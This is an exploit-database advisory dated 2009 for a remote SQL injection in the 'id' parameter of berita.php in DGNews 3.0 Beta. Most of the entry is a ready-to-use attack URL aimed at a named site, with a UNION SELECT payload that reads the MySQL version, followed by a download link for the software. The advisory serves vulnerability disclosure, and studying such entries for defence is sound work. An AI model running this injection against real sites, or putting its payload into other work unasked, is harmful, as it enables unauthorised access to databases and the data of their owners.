DGNews 3.0 Beta - 'id' SQL Injection

EDB-ID:

8727




Platform:

PHP

Date:

2009-05-18


********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************
            
http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--
            
mysql 5 :)
            
Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]